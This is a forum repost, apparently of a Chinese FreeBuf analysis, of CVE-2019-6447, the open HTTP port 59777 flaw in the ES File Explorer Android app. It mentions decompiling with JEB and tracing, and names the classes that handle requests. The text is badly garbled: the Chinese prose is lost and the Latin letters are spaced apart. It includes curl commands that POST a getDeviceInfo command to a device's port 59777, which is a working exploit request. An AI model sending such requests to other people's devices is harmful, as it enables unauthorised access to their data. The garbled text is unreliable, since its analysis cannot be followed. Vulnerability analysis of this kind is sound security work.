搜索

[13743] 2019-02-10_ES文件浏览器CVE-2019-6447漏洞分析

文档创建者:s7ckTeam
浏览次数:29
最后更新:2025-01-18
2019-02-10_ES文件浏览器CVE-2019-6447漏洞分析 E S C V E - 2 0 1 9 - 6 4 4 7 x c y _ m e r l i n   F r e e B u f   2 0 1 9 - 0 2 - 1 0 E S   F i l e   E x p l o r e r   O p e n   P o r t   V u l n e r a b i l i t y   -   C V E - 2 0 1 9 - 6 4 4 7 E S H T T P 5 9 7 7 7 p a y l o a d a p k 4 . 1 . 9 . 7 . 4   a n d   b e l o w f s 0 c 1 3 1 y C V E - 2 0 1 9 - 6 4 4 7 E S 4 . 1 . 9 . 7 . 4 g o o g l e   p l a y E S 5 9 7 7 7 p a y l o a d 5 0 0 E R R O R 4 . 1 . 9 . 4 4 . 1 . 9 . 4 E S E S
A P K D E X l i b g r e p 5 9 7 7 7 c l a s s e s 2 . d e x c l a s s s e s 2 . d e x c o m m a n d c o m / e s t r o n g s / a n d r o i d / f / a , c o m / e s t r o n g s / a n d r o i d / f / a . a a . c l a s s , b . c l a s s , c . c l a s s a . c l a s s c . c l a s s
j e b s m a l i t r a c e a n d r o i d   t r a c e T r a c e R e a d e r t r a c e
D D M S T r a c e p a y l o a d p a y l o a d g i t h u b h t t p s : / / g i t h u b . c o m / f s 0 c 1 3 1 y / E S F i l e E x p l o r e r O p e n P o r t V u l n t r a c e r T r a c e R e a d e r c o m / e s t r o n g s / a n d r o i d / f / c $ a . r u n ( ) V a . c l a s s c . c l a s s s o c k e t b u f f e r c u r l   - - h e a d e r   " C o n t e n t - T y p e :   a p p l i c a t i o n / j s o n "   - - r e q u e s t   P O S T   - - d a t a   " { " c o m m a n d " : g e t D e v i c e I n f o } "   h t t p : / / 1 9 2 . 1 6 8 . 1 3   7 . 1 0 : 5 9 7 7 7   - v v v
p o s t p o s t c o n t e n t - t y p e l a b e l _ 1 8 9 l a b e l 1 8 9 v 2 7   =   t h i s . a . a p a r s e u r l o t h e r d a t a ( v 9 ,   v 1 0 ,   v 1 1 ,   v 6 ,   v 7 ) ; c o m m a n d J E B a . c l a s s ( c o m / c o m / e s t r o n g s / a n d r o i d / f / a ) a p a r s e u r l o t h e r d a t a a J E B a . c l a s s a p a r s e u r l o t h e r d a t a
c o m / e s t r o n g s / a n d r o i d / f / a . a c o m m a n d j s o n
c o m / e s t r o n g s / a n d r o i d / f / c $ a . a ( L j a v a / l a n g / S t r i n g ; L j a v a / l a n g / S t r i n g ; L j a v a / u t i l / P r o p e r t i e s ; L j a v a / i o / I n p u t S t r e a m ; ) V r e s p o n s e O u t p u t S t r e a m  
E S E S v 2 _ 7 n u l l t h i s . a ( " 5 0 0   I n t e r n a l   S e r v e r   E r r o r " , " S E R V E R   I N T E R N A L   E R R O R :   S e r v e ( )   r e t u r n e d   a   n u l l   r e s p o n s e . " ) ; E S 5 0 0 4 . 1 . 6 . 6 . 1 4 . 1 . 6 . 6 . 1 E S E S c u r l 5 0 0
f a . c l a s s E S H t t p S e r v e r c u r l c u r l   - - h e a d e r   " C o n t e n t - T y p e :   a p p l i c a t i o n / j s o n "   - - r e q u e s t   P O S T   - - d a t a   " { " c o m m a n d " : g e t D e v i c e I n f o } "   h t t p : / / 1 9 2 . 1 6 8 . 0 .   1 2 2 : 5 9 7 7 7   - v v v
E S a p p c o m . e s t r o n g s . a n d r o i d . f . h . a ( L j a v a / l a n g / S t r i n g ; L j a v a / u t i l / P r o p e r t i e s ; ) V b J b J b J u r l a p . a ( ) W I F I
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理